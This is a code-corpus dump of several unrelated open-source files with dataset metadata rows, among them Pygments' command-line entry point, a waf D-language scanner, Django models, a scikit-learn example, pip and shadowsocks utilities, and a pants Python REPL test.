F_opts = _parse_filters(F_opts)
opts.pop('-F', None)
# select formatter
outfn = opts.pop('-o', None)
fmter = opts.pop('-f', None)
if fmter:
try:
fmter = get_formatter_by_name(fmter, **parsed_opts)
except (OptionError, ClassNotFound) as err:
print('Error:', err, file=sys.stderr)
return 1
if outfn:
if not fmter:
try:
fmter = get_formatter_for_filename(outfn, **parsed_opts)
except (OptionError, ClassNotFound) as err:
print('Error:', err, file=sys.stderr)
return 1
try:
outfile = open(outfn, 'wb')
except Exception as err:
print('Error: cannot open outfile:', err, file=sys.stderr)
return 1
else:
if not fmter:
fmter = TerminalFormatter(**parsed_opts)
outfile = sys.stdout
# select lexer
lexer = opts.pop('-l', None)
if lexer:
try:
lexer = get_lexer_by_name(lexer, **parsed_opts)
except (OptionError, ClassNotFound) as err:
print('Error:', err, file=sys.stderr)
return 1
if args:
if len(args) > 1:
print(usage, file=sys.stderr)
return 2
infn = args[0]
try:
code = open(infn, 'rb').read()
except Exception as err:
print('Error: cannot read infile:', err, file=sys.stderr)
return 1
if not lexer:
try:
lexer = get_lexer_for_filename(infn, code, **parsed_opts)
except ClassNotFound as err:
if '-g' in opts:
try:
lexer = guess_lexer(code, **parsed_opts)
except ClassNotFound:
lexer = TextLexer(**parsed_opts)
else:
print('Error:', err, file=sys.stderr)
return 1
except OptionError as err:
print('Error:', err, file=sys.stderr)
return 1
else:
if '-g' in opts:
code = sys.stdin.read()
try:
lexer = guess_lexer(code, **parsed_opts)
except ClassNotFound:
lexer = TextLexer(**parsed_opts)
elif not lexer:
print('Error: no lexer name given and reading ' + \
'from stdin (try using -g or -l <lexer>)', file=sys.stderr)
return 2
else:
code = sys.stdin.read()
# No encoding given? Use latin1 if output file given,
# stdin/stdout encoding otherwise.
# (This is a compromise, I'm not too happy with it...)
if 'encoding' not in parsed_opts and 'outencoding' not in parsed_opts:
if outfn:
# encoding pass-through
fmter.encoding = 'latin1'
else:
if sys.version_info < (3,):
# use terminal encoding; Python 3's terminals already do that
lexer.encoding = getattr(sys.stdin, 'encoding',
None) or 'ascii'
fmter.encoding = getattr(sys.stdout, 'encoding',
None) or 'ascii'
elif not outfn and sys.version_info > (3,):
# output to terminal with encoding -> use .buffer
outfile = sys.stdout.buffer
# ... and do it!
try:
# process filters
for fname, fopts in F_opts:
lexer.add_filter(fname, **fopts)
highlight(code, lexer, fmter, outfile)
except Exception as err:
import traceback
info = traceback.format_exception(*sys.exc_info())
msg = info[-1].strip()
if len(info) >= 3:
# extract relevant file and position info
msg += '\n (f%s)' % info[-2].split('\n')[0].strip()[1:]
print(file=sys.stderr)
print('*** Error while highlighting:', file=sys.stderr)
print(msg, file=sys.stderr)
return 1
return 0
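# Usage sketch (not part of the original module): invoking the command line
# entry point programmatically. The file names below are illustrative
# placeholders; this mirrors ``pygmentize -l python -f html -o out.html example.py``.
if __name__ == '__main__':
    sys.exit(main(['pygmentize', '-l', 'python', '-f', 'html',
                   '-o', 'out.html', 'example.py']))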
| mit | -6,413,053,661,395,489,000 | 29.886621 | 91 | 0.537552 | false |
RadioFreeAsia/RDacity | lib-src/lv2/suil/waflib/Tools/d_scan.py | 292 | 3029 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import re
from waflib import Utils,Logs
def filter_comments(filename):
txt=Utils.readf(filename)
i=0
buf=[]
max=len(txt)
begin=0
while i<max:
c=txt[i]
if c=='"'or c=="'":
buf.append(txt[begin:i])
delim=c
i+=1
while i<max:
c=txt[i]
if c==delim:break
elif c=='\\':
i+=1
i+=1
i+=1
begin=i
elif c=='/':
buf.append(txt[begin:i])
i+=1
if i==max:break
c=txt[i]
if c=='+':
i+=1
nesting=1
c=None
while i<max:
prev=c
c=txt[i]
if prev=='/'and c=='+':
nesting+=1
c=None
elif prev=='+'and c=='/':
nesting-=1
if nesting==0:break
c=None
i+=1
elif c=='*':
i+=1
c=None
while i<max:
prev=c
c=txt[i]
if prev=='*'and c=='/':break
i+=1
elif c=='/':
i+=1
while i<max and txt[i]!='\n':
i+=1
else:
begin=i-1
continue
i+=1
begin=i
buf.append(' ')
else:
i+=1
buf.append(txt[begin:])
return buf
class d_parser(object):
def __init__(self,env,incpaths):
self.allnames=[]
self.re_module=re.compile("module\s+([^;]+)")
self.re_import=re.compile("import\s+([^;]+)")
self.re_import_bindings=re.compile("([^:]+):(.*)")
self.re_import_alias=re.compile("[^=]+=(.+)")
self.env=env
self.nodes=[]
self.names=[]
self.incpaths=incpaths
def tryfind(self,filename):
found=0
for n in self.incpaths:
found=n.find_resource(filename.replace('.','/')+'.d')
if found:
self.nodes.append(found)
self.waiting.append(found)
break
if not found:
if not filename in self.names:
self.names.append(filename)
def get_strings(self,code):
self.module=''
lst=[]
mod_name=self.re_module.search(code)
if mod_name:
self.module=re.sub('\s+','',mod_name.group(1))
import_iterator=self.re_import.finditer(code)
if import_iterator:
for import_match in import_iterator:
import_match_str=re.sub('\s+','',import_match.group(1))
bindings_match=self.re_import_bindings.match(import_match_str)
if bindings_match:
import_match_str=bindings_match.group(1)
matches=import_match_str.split(',')
for match in matches:
alias_match=self.re_import_alias.match(match)
if alias_match:
match=alias_match.group(1)
lst.append(match)
return lst
def start(self,node):
self.waiting=[node]
while self.waiting:
nd=self.waiting.pop(0)
self.iter(nd)
def iter(self,node):
path=node.abspath()
code="".join(filter_comments(path))
names=self.get_strings(code)
for x in names:
if x in self.allnames:continue
self.allnames.append(x)
self.tryfind(x)
def scan(self):
env=self.env
gruik=d_parser(env,self.generator.includes_nodes)
node=self.inputs[0]
gruik.start(node)
nodes=gruik.nodes
names=gruik.names
if Logs.verbose:
Logs.debug('deps: deps for %s: %r; unresolved %r'%(str(node),nodes,names))
return(nodes,names)
| gpl-2.0 | -7,910,437,893,230,303,000 | 21.774436 | 102 | 0.614064 | false |
jakereps/qiime2 | qiime2/core/archive/format/tests/test_v0.py | 2 | 2307 | # ----------------------------------------------------------------------------
# Copyright (c) 2016-2021, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import unittest
import tempfile
import uuid as _uuid
import pathlib
import io
from qiime2.core.testing.type import IntSequence1
from qiime2.core.testing.format import IntSequenceDirectoryFormat
from qiime2.core.archive.archiver import _ZipArchive, ArchiveRecord
from qiime2.core.archive.format.v0 import ArchiveFormat
class TestArchiveFormat(unittest.TestCase):
def setUp(self):
prefix = "qiime2-test-temp-"
self.temp_dir = tempfile.TemporaryDirectory(prefix=prefix)
def test_format_metadata(self):
uuid = _uuid.uuid4()
with io.StringIO() as fh:
ArchiveFormat._format_metadata(fh, uuid, IntSequence1,
IntSequenceDirectoryFormat)
result = fh.getvalue()
self.assertEqual(result,
"uuid: %s\ntype: IntSequence1\nformat: "
"IntSequenceDirectoryFormat\n" % uuid)
def test_format_metadata_none(self):
uuid = _uuid.uuid4()
with io.StringIO() as fh:
ArchiveFormat._format_metadata(fh, uuid, IntSequence1, None)
result = fh.getvalue()
self.assertEqual(result,
"uuid: %s\ntype: IntSequence1\nformat: null\n" % uuid)
def test_load_root_dir_metadata_uuid_mismatch(self):
fp = pathlib.Path(self.temp_dir.name) / 'root-dir-metadata-mismatch'
fp.mkdir()
r = _ZipArchive.setup(fp, 'foo', 'bar')
fake = ArchiveRecord(r.root, r.version_fp,
_uuid.uuid4(), # This will trick the format
r.version, r.framework_version)
ArchiveFormat.write(fake, IntSequence1, IntSequenceDirectoryFormat,
lambda x: None, None)
with self.assertRaisesRegex(
ValueError, 'root directory must match UUID.*metadata'):
ArchiveFormat(r)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | -4,551,712,732,040,404,000 | 36.209677 | 79 | 0.579541 | false |
angelbot/geoincentives | geoincentives/models.py | 1 | 3064 | from django.db import models
from django.contrib.auth.models import User as DjangoUser
from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth.models import UserManager
import hashlib
class User(models.Model):
USER_TYPE = (
(1, 'student'),
(2, 'business'),
(3, 'nonprofit')
)
auth_user = models.OneToOneField(DjangoUser)
    type = models.CharField(max_length=100, null=True, blank=False, choices=USER_TYPE, default=USER_TYPE[1][0])
company = models.CharField(max_length=255, null=True, db_index=True, blank=True)
address = models.CharField(max_length=255, null=True, db_index=True, blank=False)
city = models.CharField(max_length=255, null=True, db_index=True, blank=False)
state = models.CharField(max_length=30, null=True, db_index=True, blank=False)
zipcode = models.CharField(max_length=5, null=True, db_index=True, blank=False)
school = models.CharField(max_length=255, null=True, db_index=True, blank=False)
birthdate = models.DateField(blank=True, null=True)
points = models.IntegerField(null=True, blank=True)
def __unicode__(self):
return u'%s' % self.auth_user.email
class EventType(models.Model):
name = models.CharField(max_length=255, null=True, blank=False)
max_checkin = models.IntegerField()
def __unicode__(self):
return u'%s' % self.name
class Event(models.Model):
EVENT_STATUS = (
(1, 'active'),
(2, 'inactive')
)
name = models.CharField(max_length=255, null=True, blank=False)
type = models.ForeignKey(EventType, null=True, blank=True)
status = models.IntegerField(max_length=100, null=True, blank=False, choices=EVENT_STATUS)
start_time = models.CharField(max_length=5, null=True, blank=False)
end_time = models.CharField(max_length=5, null=True, blank=False)
date = models.DateField(null=True, blank=True)
point_value = models.IntegerField()
recurring = models.BooleanField()
verified = models.BooleanField()
address = models.CharField(max_length=255, null=True, db_index=True, blank=False)
city = models.CharField(max_length=255, null=True, db_index=True, blank=False)
state = models.CharField(max_length=30, null=True, db_index=True, blank=False)
zipcode = models.CharField(max_length=5, null=True, db_index=True, blank=False)
latitude = models.FloatField(null=True, blank=True)
longitude = models.FloatField(null=True, blank=True)
def __unicode__(self):
return u'%s' % self.name
class UserEvent(models.Model):
user = models.ForeignKey(DjangoUser, null=True, blank=True)
event = models.ForeignKey(Event, null=True, blank=True)
date = models.DateField()
def __unicode__(self):
return u'%s %s' % (self.user.username, self.event.name)
class Reward(models.Model):
name = models.CharField(max_length=255, null=True, blank=False)
available = models.IntegerField()
points = models.IntegerField()
def __unicode__(self):
return u'%s' % (self.name)
| gpl-2.0 | 2,096,577,816,930,010,000 | 39.315789 | 108 | 0.685705 | false |
zhenv5/scikit-learn | examples/feature_selection/plot_feature_selection.py | 249 | 2827 | """
===============================
Univariate Feature Selection
===============================
An example showing univariate feature selection.
Noisy (non informative) features are added to the iris data and
univariate feature selection is applied. For each feature, we plot the
p-values for the univariate feature selection and the corresponding
weights of an SVM. We can see that univariate feature selection
selects the informative features and that these have larger SVM weights.
In the total set of features, only the 4 first ones are significant. We
can see that they have the highest score with univariate feature
selection. The SVM assigns a large weight to one of these features, but also
Selects many of the non-informative features.
Applying univariate feature selection before the SVM
increases the SVM weight attributed to the significant features, and will
thus improve classification.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn import datasets, svm
from sklearn.feature_selection import SelectPercentile, f_classif
###############################################################################
# import some data to play with
# The iris dataset
iris = datasets.load_iris()
# Some noisy data not correlated
E = np.random.uniform(0, 0.1, size=(len(iris.data), 20))
# Add the noisy data to the informative features
X = np.hstack((iris.data, E))
y = iris.target
###############################################################################
plt.figure(1)
plt.clf()
X_indices = np.arange(X.shape[-1])
###############################################################################
# Univariate feature selection with F-test for feature scoring
# We use the default selection function: the 10% most significant features
selector = SelectPercentile(f_classif, percentile=10)
selector.fit(X, y)
scores = -np.log10(selector.pvalues_)
scores /= scores.max()
plt.bar(X_indices - .45, scores, width=.2,
label=r'Univariate score ($-Log(p_{value})$)', color='g')
###############################################################################
# Compare to the weights of an SVM
clf = svm.SVC(kernel='linear')
clf.fit(X, y)
svm_weights = (clf.coef_ ** 2).sum(axis=0)
svm_weights /= svm_weights.max()
plt.bar(X_indices - .25, svm_weights, width=.2, label='SVM weight', color='r')
clf_selected = svm.SVC(kernel='linear')
clf_selected.fit(selector.transform(X), y)
svm_weights_selected = (clf_selected.coef_ ** 2).sum(axis=0)
svm_weights_selected /= svm_weights_selected.max()
plt.bar(X_indices[selector.get_support()] - .05, svm_weights_selected,
width=.2, label='SVM weights after selection', color='b')
plt.title("Comparing feature selection")
plt.xlabel('Feature number')
plt.yticks(())
plt.axis('tight')
plt.legend(loc='upper right')
plt.show()
| bsd-3-clause | 2,629,065,323,852,358,000 | 32.654762 | 79 | 0.645561 | false |
unnikrishnankgs/va | venv/lib/python3.5/site-packages/tensorflow/contrib/keras/api/keras/applications/xception/__init__.py | 57 | 1148 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Xception Keras application."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.keras.python.keras.applications.xception import decode_predictions
from tensorflow.contrib.keras.python.keras.applications.xception import preprocess_input
from tensorflow.contrib.keras.python.keras.applications.xception import Xception
del absolute_import
del division
del print_function
| bsd-2-clause | 8,161,418,690,972,873,000 | 41.518519 | 90 | 0.736934 | false |
kezabelle/django-sniplates | docs/conf.py | 4 | 8236 | # -*- coding: utf-8 -*-
#
# Django Sniplates documentation build configuration file, created by
# sphinx-quickstart on Sat Sep 6 10:23:25 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Django Sniplates'
copyright = u'2014, Curtis Maloney'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.3'
# The full version, including alpha/beta/rc tags.
release = '0.3.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'DjangoSniplatesdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'DjangoSniplates.tex', u'Django Sniplates Documentation',
u'Curtis Maloney', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'djangosniplates', u'Django Sniplates Documentation',
[u'Curtis Maloney'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'DjangoSniplates', u'Django Sniplates Documentation',
u'Curtis Maloney', 'DjangoSniplates', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| mit | 4,453,535,118,152,873,000 | 30.922481 | 79 | 0.709811 | false |
damianam/easybuild-framework | easybuild/toolchains/linalg/atlas.py | 3 | 1662 | ##
# Copyright 2012-2017 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
Support for ATLAS as toolchain linear algebra library.
:author: Stijn De Weirdt (Ghent University)
:author: Kenneth Hoste (Ghent University)
"""
from easybuild.tools.toolchain.linalg import LinAlg
TC_CONSTANT_ATLAS = 'ATLAS'
class Atlas(LinAlg):
"""
Provides ATLAS BLAS/LAPACK support.
LAPACK is a build dependency only
"""
BLAS_MODULE_NAME = ['ATLAS']
BLAS_LIB = ["cblas", "f77blas", "atlas"]
BLAS_LIB_MT = ["ptcblas", "ptf77blas", "atlas"]
BLAS_FAMILY = TC_CONSTANT_ATLAS
LAPACK_MODULE_NAME = ['ATLAS']
LAPACK_LIB = ['lapack']
LAPACK_FAMILY = TC_CONSTANT_ATLAS
| gpl-2.0 | 147,937,814,262,639,360 | 32.24 | 96 | 0.719615 | false |
sunze/py_flask | venv/lib/python3.4/site-packages/pip/req/req_requirement.py | 118 | 1245 | from pip._vendor.packaging.version import parse as parse_version
class InstallationCandidate(object):
def __init__(self, project, version, location):
self.project = project
self.version = parse_version(version)
self.location = location
self._key = (self.project, self.version, self.location)
def __repr__(self):
return "<InstallationCandidate({0!r}, {1!r}, {2!r})>".format(
self.project, self.version, self.location,
)
def __hash__(self):
return hash(self._key)
def __lt__(self, other):
return self._compare(other, lambda s, o: s < o)
def __le__(self, other):
return self._compare(other, lambda s, o: s <= o)
def __eq__(self, other):
return self._compare(other, lambda s, o: s == o)
def __ge__(self, other):
return self._compare(other, lambda s, o: s >= o)
def __gt__(self, other):
return self._compare(other, lambda s, o: s > o)
def __ne__(self, other):
return self._compare(other, lambda s, o: s != o)
def _compare(self, other, method):
if not isinstance(other, InstallationCandidate):
return NotImplemented
return method(self._key, other._key)
| mit | 2,986,139,986,441,562,600 | 27.953488 | 69 | 0.585542 | false |
rchlin/ShadowsocksFork | shadowsocks/crypto/util.py | 1032 | 4287 | #!/usr/bin/env python
#
# Copyright 2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import logging
def find_library_nt(name):
# modified from ctypes.util
    # ctypes.util.find_library just returns the first result it finds,
    # but we want to try them all,
    # because on Windows, users may have both 32bit and 64bit versions installed
results = []
for directory in os.environ['PATH'].split(os.pathsep):
fname = os.path.join(directory, name)
if os.path.isfile(fname):
results.append(fname)
if fname.lower().endswith(".dll"):
continue
fname = fname + ".dll"
if os.path.isfile(fname):
results.append(fname)
return results
def find_library(possible_lib_names, search_symbol, library_name):
import ctypes.util
from ctypes import CDLL
paths = []
if type(possible_lib_names) not in (list, tuple):
possible_lib_names = [possible_lib_names]
lib_names = []
for lib_name in possible_lib_names:
lib_names.append(lib_name)
lib_names.append('lib' + lib_name)
for name in lib_names:
if os.name == "nt":
paths.extend(find_library_nt(name))
else:
path = ctypes.util.find_library(name)
if path:
paths.append(path)
if not paths:
# We may get here when find_library fails because, for example,
# the user does not have sufficient privileges to access those
# tools underlying find_library on linux.
import glob
for name in lib_names:
patterns = [
'/usr/local/lib*/lib%s.*' % name,
'/usr/lib*/lib%s.*' % name,
'lib%s.*' % name,
'%s.dll' % name]
for pat in patterns:
files = glob.glob(pat)
if files:
paths.extend(files)
for path in paths:
try:
lib = CDLL(path)
if hasattr(lib, search_symbol):
logging.info('loading %s from %s', library_name, path)
return lib
else:
logging.warn('can\'t find symbol %s in %s', search_symbol,
path)
except Exception:
pass
return None
def run_cipher(cipher, decipher):
from os import urandom
import random
import time
BLOCK_SIZE = 16384
rounds = 1 * 1024
plain = urandom(BLOCK_SIZE * rounds)
results = []
pos = 0
print('test start')
start = time.time()
while pos < len(plain):
l = random.randint(100, 32768)
c = cipher.update(plain[pos:pos + l])
results.append(c)
pos += l
pos = 0
c = b''.join(results)
results = []
while pos < len(plain):
l = random.randint(100, 32768)
results.append(decipher.update(c[pos:pos + l]))
pos += l
end = time.time()
print('speed: %d bytes/s' % (BLOCK_SIZE * rounds / (end - start)))
assert b''.join(results) == plain
def test_find_library():
assert find_library('c', 'strcpy', 'libc') is not None
assert find_library(['c'], 'strcpy', 'libc') is not None
assert find_library(('c',), 'strcpy', 'libc') is not None
assert find_library(('crypto', 'eay32'), 'EVP_CipherUpdate',
'libcrypto') is not None
assert find_library('notexist', 'strcpy', 'libnotexist') is None
assert find_library('c', 'symbol_not_exist', 'c') is None
assert find_library(('notexist', 'c', 'crypto', 'eay32'),
'EVP_CipherUpdate', 'libc') is not None
if __name__ == '__main__':
test_find_library()
| apache-2.0 | 4,535,419,741,656,012,000 | 30.065217 | 79 | 0.585724 | false |
kslundberg/pants | tests/python/pants_test/backend/python/tasks/test_python_repl.py | 2 | 6547 | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
import sys
from contextlib import contextmanager
from textwrap import dedent
from pants.backend.core.tasks.repl_task_mixin import ReplTaskMixin
from pants.backend.python.targets.python_binary import PythonBinary
from pants.backend.python.targets.python_library import PythonLibrary
from pants.backend.python.targets.python_requirement_library import PythonRequirementLibrary
from pants.backend.python.tasks.python_repl import PythonRepl
from pants.base.address import Address
from pants.base.build_file_aliases import BuildFileAliases
from pants.base.exceptions import TaskError
from pants.base.source_root import SourceRoot
from pants.base.target import Target
from pants.util.contextutil import temporary_dir
from pants_test.backend.python.tasks.python_task_test_base import PythonTaskTestBase
class PythonReplTest(PythonTaskTestBase):
@classmethod
def task_type(cls):
return PythonRepl
class JvmTarget(Target):
pass
@property
def alias_groups(self):
return super(PythonReplTest, self).alias_groups.merge(
BuildFileAliases(targets={'jvm_target': self.JvmTarget}))
def create_non_python_target(self, relpath, name):
self.create_file(relpath=self.build_path(relpath), contents=dedent("""
jvm_target(
name='{name}',
)
""").format(name=name))
return self.target(Address(relpath, name).spec)
def setUp(self):
super(PythonReplTest, self).setUp()
SourceRoot.register('3rdparty', PythonRequirementLibrary)
SourceRoot.register('src', PythonBinary, PythonLibrary)
self.six = self.create_python_requirement_library('3rdparty/six', 'six',
requirements=['six==1.9.0'])
self.requests = self.create_python_requirement_library('3rdparty/requests', 'requests',
requirements=['requests==2.6.0'])
self.library = self.create_python_library('src/lib', 'lib', {'lib.py': dedent("""
import six
def go():
six.print_('go', 'go', 'go!', sep='')
""")}, dependencies=['//3rdparty/six'])
self.binary = self.create_python_binary('src/bin', 'bin', 'lib.go', dependencies=['//src/lib'])
self.non_python_target = self.create_non_python_target('src/java', 'java')
def tearDown(self):
super(PythonReplTest, self).tearDown()
SourceRoot.reset()
ReplTaskMixin.reset_implementations()
@contextmanager
def new_io(self, input):
orig_stdin, orig_stdout, orig_stderr = sys.stdin, sys.stdout, sys.stderr
with temporary_dir() as iodir:
stdin = os.path.join(iodir, 'stdin')
stdout = os.path.join(iodir, 'stdout')
stderr = os.path.join(iodir, 'stderr')
with open(stdin, 'w') as fp:
fp.write(input)
with open(stdin, 'rb') as inp, open(stdout, 'wb') as out, open(stderr, 'wb') as err:
sys.stdin, sys.stdout, sys.stderr = inp, out, err
try:
yield inp, out, err
finally:
sys.stdin, sys.stdout, sys.stderr = orig_stdin, orig_stdout, orig_stderr
def do_test_repl(self, code, expected, targets, options=None):
if options:
self.set_options(**options)
class JvmRepl(ReplTaskMixin):
options_scope = 'test_scope_jvm_repl'
@classmethod
def select_targets(cls, target):
return isinstance(target, self.JvmTarget)
def setup_repl_session(_, targets):
raise AssertionError()
def launch_repl(_, session_setup):
raise AssertionError()
# Add a competing REPL impl.
JvmRepl.prepare(self.options, round_manager=None)
python_repl = self.create_task(self.context(target_roots=targets))
original_launcher = python_repl.launch_repl
with self.new_io('\n'.join(code)) as (inp, out, err):
def custom_io_patched_launcher(pex):
return original_launcher(pex, stdin=inp, stdout=out, stderr=err)
python_repl.launch_repl = custom_io_patched_launcher
python_repl.execute()
with open(out.name) as fp:
lines = fp.read()
if not expected:
self.assertEqual('', lines)
else:
for expectation in expected:
self.assertIn(expectation, lines)
def do_test_library(self, *targets):
self.do_test_repl(code=['from lib.lib import go',
'go()'],
expected=['gogogo!'],
targets=targets)
def test_library(self):
self.do_test_library(self.library)
def test_binary(self):
self.do_test_library(self.binary)
def test_requirement(self):
self.do_test_repl(code=['import six',
'print("python 2?:{}".format(six.PY2))'],
expected=['python 2?:True'],
targets=[self.six])
def test_mixed_python(self):
self.do_test_repl(code=['import requests',
'import six',
'from lib.lib import go',
'print("teapot response code is: {}".format(requests.codes.teapot))',
'go()',
'print("python 2?:{}".format(six.PY2))'],
expected=['teapot response code is: 418',
'gogogo!',
'python 2?:True'],
targets=[self.requests, self.binary])
def test_disallowed_mix(self):
with self.assertRaises(TaskError):
self.do_test_repl(code=['print("unreachable")'],
expected=[],
targets=[self.library, self.non_python_target])
def test_non_python_targets(self):
self.do_test_repl(code=['import java.lang.unreachable'],
expected=[''],
targets=[self.non_python_target])
def test_ipython(self):
# IPython supports shelling out with a leading !, so indirectly test its presence by reading
# the head of this very file.
with open(__file__) as fp:
me = fp.readline()
self.do_test_repl(code=['!head -1 {}'.format(__file__)],
expected=[me],
targets=[self.six], # Just to get the repl to pop up.
options={'ipython': True})
